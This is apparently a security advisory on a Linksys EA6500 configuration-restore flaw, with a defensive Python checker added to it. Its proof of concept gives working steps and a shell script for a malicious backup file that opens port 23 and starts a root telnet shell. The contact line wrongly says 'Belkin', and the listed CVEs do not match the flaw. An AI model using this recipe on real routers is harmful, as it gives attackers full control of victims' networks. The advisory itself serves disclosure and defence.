---
title: 'Linksys EA6500 - Independent Security Evaluators'
description: 'The Linksys EA6500 does not properly validate backed-up configuration files that are restored through the web management interface. If a device administrator can be fooled into restoring a malicious configuration file, an attacker can create or overwrite arbitrary files on the EA6500''s file system, and obtain remote, root shell access.'
---

Compromising the Linksys EA6500


Description

The Linksys EA6500 does not properly validate backed-up configuration files that are restored through the web management interface. If a device administrator can be fooled into restoring a malicious configuration file, an attacker can create or overwrite arbitrary files on the EA6500's file system, and obtain remote, root shell access.

Attack Requirements

  • The victim must be fooled into logging in to the EA6500's web interface and restoring a malicious configuration file.

Details

Backup configuration files for the Linksys EA6500 contain a tar.gz archive file, and upon restoration, the device extracts the archive to the root of the file system. By including a telnet daemon, and a cron script that starts the daemon, an attacker can gain root shell access to the router.

Vulnerable firmware version: 1.1.28.147876

Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Configuration files should be validated before they are restored to the router.
  • Configuration files should contain only data that is carefully parsed by the router, and not arbitrary files that are extracted to the file system.

Recommendations to device administrators

  • (4/13/2013) No firmware upgrade that remedies this vulnerability is currently available.
  • Never restore a configuration file from an untrusted source.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page.

Proof of Concept

  • Create the necessary directory structure:
    mkdir -p tmp/cron/cron.everyminute
  • Write the script shown in Figure 1 to the file
    tmp/cron/cron.everyminute/utelnetd.sh, and set 755
    permissions.
  • Download the utelnetd source code from the Internet,
    cross-compile a statically linked version for the mipsel
    architecture, and write it to tmp/utelnetd, with 755
    permissions.
  • Archive the files to a tar.gz file:
    tar -czpvf backup.tar.gz --owner=root --group=root \
         tmp
  • Add the header necessary for the router to process the
    archive as a configuration backup:
    echo -e '0x0002\n'`stat -c %s backup.tar.gz` | \
         cat - backup.tar.gz > backup.cfg
  • Provide the resulting backup.cfg file to the victim.

#!/bin/sh
# Allow inbound TCP connections to port 23 through the firewall
/sbin/iptables -I INPUT -p tcp --dport 23 -j ACCEPT
# Start the statically linked telnet daemon, handing each session a shell
/tmp/utelnetd -l /bin/sh

Figure 1. Script to open port 23 to the Internet and start a Telnet server.
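The first vendor recommendation, validating a backup before restoring it, as an added example (not ISE's or Linksys's code): a Python checker that parses the two-line header shown in the proof of concept, verifies the declared size against the payload, and rejects archives carrying traversal or absolute paths, entries outside an allowlist, links, devices or executable files. The allowlist prefix etc/config/ and the build_backup fixture are assumptions for illustration; the real on-device layout is not described on this page.

```python
import io
import tarfile

# Layout shown in the proof of concept: "0x0002\n<payload size>\n" followed by
# the tar.gz bytes. ALLOWED is an assumed allowlist of where settings may live.
MAGIC = b"0x0002"
ALLOWED = ("etc/config/",)  # hypothetical; the real layout is not on this page


def check_backup(data: bytes) -> list:
    """Return reasons to reject a backup.cfg; an empty list means it passed."""
    parts = data.split(b"\n", 2)  # -> [tag, declared size, payload]
    if len(parts) != 3:
        return ["malformed header: fewer than two lines"]
    tag, size_field, payload = parts
    problems = []
    if tag != MAGIC:
        problems.append(f"unexpected tag {tag!r}")
    if not size_field.isdigit() or int(size_field) != len(payload):
        problems.append(f"declared size {size_field!r} != payload length {len(payload)}")
    try:
        with tarfile.open(fileobj=io.BytesIO(payload), mode="r:gz") as tf:
            for m in tf.getmembers():
                # Refuse anything that could land outside the allowed config area
                if m.name.startswith("/") or ".." in m.name.split("/"):
                    problems.append(f"unsafe path: {m.name}")
                elif not m.name.startswith(ALLOWED):
                    problems.append(f"path outside allowlist: {m.name}")
                # Refuse entry types a settings backup has no reason to carry
                if m.issym() or m.islnk() or m.isdev():
                    problems.append(f"link or device entry: {m.name}")
                elif m.isfile() and m.mode & 0o111:
                    problems.append(f"executable file: {m.name}")
    except tarfile.TarError as e:
        problems.append(f"not a valid tar.gz: {e}")
    return problems


def build_backup(entries) -> bytes:
    """Constructed fixture, not a real EA6500 backup: entries are (path, bytes, mode)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, content, mode in entries:
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(content), mode
            tf.addfile(info, io.BytesIO(content))
    payload = buf.getvalue()
    return MAGIC + b"\n" + str(len(payload)).encode() + b"\n" + payload
```

A checker like this, run before extraction, would reject the proof-of-concept archive on two independent grounds (a path outside the config area and an executable cron script) rather than relying on the header alone.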

References

  • Utelnetd on Sourceforge
  • CVE-2013-3064: Unvalidated URL Redirect
  • CVE-2013-3065: DOM Cross-Site Scripting
  • CVE-2013-3066: Information Disclosure

Credit

  • Discovered By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Thompson – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io